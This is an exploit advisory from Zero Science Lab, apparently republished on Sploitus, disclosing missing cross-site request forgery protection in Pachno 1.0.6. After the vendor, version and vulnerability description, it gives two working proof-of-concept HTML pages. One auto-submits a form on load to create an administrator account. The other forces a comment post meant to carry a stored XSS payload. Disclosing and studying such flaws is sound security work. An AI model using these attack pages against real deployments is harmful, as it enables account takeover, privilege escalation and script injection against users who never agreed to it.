Share
## https://sploitus.com/exploit?id=PACKETSTORM:218857
Pachno 1.0.6 Cross-Site Request Forgery
    
    
    Vendor: Daniel AndrΓ© Eikeland
    Product web page: https://github.com/pachno/pachno
    Affected version: 1.0.6
    
    Summary: Pachno is an open-source collaboration platform (formerly known as The Bug Genie)
    designed for team project management, issue tracking, and documentation. It offers a module-based,
    customizable environment for software development and team workflows, distributed under the
    Mozilla Public License.
    
    Desc: CSRF protection in the application is opt-in via the @CsrfProtected annotation and the
    csrf_enabled route flag, both of which are absent from a large set of state-changing endpoints
    including login, registration, logout, file upload, milestone editing, group/role/team/client/user
    administration, and Livelink commit posting. No same-origin enforcement, anti-CSRF token, or
    SameSite=Strict cookie attribute is in place to compensate. This can be exploited to perform
    arbitrary actions in context of an authenticated user, including forced logout, account creation
    by an admin, role modification, comment injection, and file upload. This can be exploited to
    perform certain actions with administrative privileges if a logged-in user visits a malicious
    web site.
    
    Tested on: GNU/Linux
               Apache2
               PHP/7.4
               MySQL/5.7 (MariaDB)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2026-5983
    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5983
    
    
    06.04.2026
    
    --
    
    
    CSRF Add Admin:
    ---------------
    <html>
    <body onload="document.forms[0].submit();">
    <form method="POST" action="http://127.0.0.1/configure/users">
      <input type="hidden" name="username" value="testingus" />
      <input type="hidden" name="password" value="pwd123" />
      <input type="hidden" name="password_repeat" value="pwd123" />
      <input type="hidden" name="email" value="lab@zeroscience.mk" />
      <input type="hidden" name="realname" value="ZSL" />
      <input type="hidden" name="group_id" value="1" />
    </form>
    </body>
    </html>
    
    
    CSRF Script Injection (Stored XSS):
    -----------------------------------
    <html>
    <body>
    <form id="csrf" method="POST" action="http://127.0.0.1/project/issues/17/comment">
      <input name="comment_body" value="IMPORTANTE: XSS Payload Here!" />
      <input name="comment_applies_type" value="1" />
      <input name="comment_applies_id" value="17" />
      <input name="comment_module" value="core" />
      <input name="comment_visibility" value="1" />
      <input name="comment_body_syntax" value="0" />
    </form>
    <script>document.getElementById('csrf').submit();</script>
    </body>
    </html>